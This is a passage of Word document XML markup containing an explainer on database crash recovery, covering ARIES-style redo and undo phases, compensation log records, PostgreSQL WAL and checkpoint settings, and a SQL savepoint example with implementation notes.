        <w:t xml:space="preserve">    Page 7:  recLSN=1001 (earliest WAL record that dirtied this page)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9E3FF3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Page 12: recLSN=1002</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B08459D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Page 9:  recLSN=1050 (dirtied by TXN 43, never flushed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47636716" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7682AB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  RedoLSN: minimum(recLSN) across all dirty pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7FC57F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">           = earliest point from which we need to redo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC857C6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="5CDC4170" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Phase 2 — Redo (replay WAL from RedoLSN forward):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C73EEE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Purpose: reconstruct database state at moment of crash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC5F0BF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB1C9BE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  For each WAL record from RedoLSN to end of log:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41956F9D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Read WAL record → which page does it affect?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE7C1F7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Is that page's pageLSN &gt;= this record's LSN?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0208D1BD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Yes: page already has this update (was flushed) → skip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2762EB32" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      No: apply the update (after-image) to the page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E5A51A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFB88F3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  After redo: database is in EXACT state it was in at crash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C19617" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Including: uncommitted changes from TXN 43, TXN 44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A7B297" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  (These will be undone in Phase 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7B3A93" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B82EC93" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Phase 3 — Undo (rollback all active transactions):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BA8EB5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Purpose: remove effects of transactions that didn't commit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78017E48" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5689C3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Process in reverse LSN order (newest to oldest):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEFF68C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D24AAC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  For TXN 43 (was active, must be aborted):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C87A551" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Read TXN 43's WAL records in reverse order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADDDF6D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    For each UPDATE record: apply before-image (undo the change)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD151FB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Write CLR (Compensation Log Record) for each undo operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6542EDE9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    After all records undone: write ABORT record for TXN 43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ADFAC8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547A9D27" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  For TXN 44 (was active, must be aborted):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEBBA7B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Same process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345DEE4E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128BF64A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  CLRs (Compensation Log Records):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E742118" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Record the undo operations in the WAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68264FA3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    If crash during undo: CLRs ensure undo doesn't get applied twice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CA09B7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    CLR has "next undo LSN" pointer: skip already-undone records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E381BC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Makes undo idempotent: crash during recovery → restart → same result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF4AB05" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="38518841" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>PostgreSQL-specific implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE50141" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6DD3B6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  WAL files: 16MB segments, named by LSN (000000010000000100000001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465FB054" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  WAL writer: background process, flushes WAL buffer every wal_writer_delay=200ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFC5DBB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">              (or immediately on COMMIT if synchronous_commit=on)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA4B941" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D63E927" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Checkpointer: periodic process that flushes dirty pages to disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF43E6F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    checkpoint_timeout: 5 minutes (max time between checkpoints)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610BE3D1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    checkpoint_completion_target: 0.9 (spread I/O over 90% of interval)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202FAB4F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    After checkpoint: WAL before checkpoint_lsn not needed for recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCBBC21" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                     Can be archived or deleted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FD344D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCC408A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  pg_lsn: PostgreSQL's LSN type (8 bytes, displayed as "0/F234A890")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD4F4C8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BF5FDE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Recovery control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CD9EDE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    pg_wal/ directory: WAL segment files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52546E9C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    pg_control: file with checkpoint location, redo start LSN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2426D9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    On restart: read pg_control → find last checkpoint → replay from there</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F313F1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Savepoints — Partial Rollback Within Atomicity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4550FED5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4D1C00" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Savepoints enable nested atomicity: rollback part of a transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C38180C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>without rolling back the entire transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFF5B59" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="5560611D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>BEGIN;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7A7212" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  INSERT INTO orders (user_id, total) VALUES (123, 100.00);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7702E5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  -- order_id = 789 returned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B6C377" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63756F84" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  SAVEPOINT after_order;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B43F924" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B999EA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  INSERT INTO order_items (order_id, product_id, quantity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10529CEC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  VALUES (789, 456, 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5AC753" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519DA0D4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  -- Oops: product 456 is out of stock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272FD183" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  ROLLBACK TO SAVEPOINT after_order;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70856907" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491B1499" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  -- Order exists, but no items yet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF21084" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  -- Try different product</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1770771D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  INSERT INTO order_items (order_id, product_id, quantity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5096613C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  VALUES (789, 999, 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341D2280" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC14AF6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  RELEASE SAVEPOINT after_order;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E659DA0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>COMMIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5CF04C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>-- Order 789 created with product 999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577B601C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="3322FD78" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6062C2A1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Savepoint: records current WAL LSN as a rollback point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D172C1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  ROLLBACK TO SAVEPOINT: undo all WAL records since savepoint LSN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492C2EE7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                         Write CLRs for the undone records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F103720" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  RELEASE SAVEPOINT: no-op (savepoint is no longer needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1F8CFB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11706888" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  In-memory: transaction's undo stack segmented by savepoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2066D9E3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Multiple savepoints: stack of {name → LSN} pairs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C1A0F3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334848B2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Subtransactions (PostgreSQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771993E7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
